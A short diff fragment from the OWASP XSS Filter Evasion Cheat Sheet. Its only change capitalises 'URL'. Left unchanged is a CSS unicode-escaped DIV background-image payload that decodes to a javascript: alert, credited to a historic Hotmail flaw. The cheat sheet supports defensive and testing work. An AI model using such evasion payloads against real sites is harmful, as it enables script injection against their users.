OWASP/CheatSheetSeries/cheatsheets/XSSFilterEvasionCheatSheet.md

 #### DIV Background-image with Unicoded XSS Exploit

-This has been modified slightly to obfuscate the url parameter.
+This has been modified slightly to obfuscate the URL parameter.
 The original vulnerability was found by Renaud Lifchitz as a vulnerability in Hotmail:

 `<DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029">`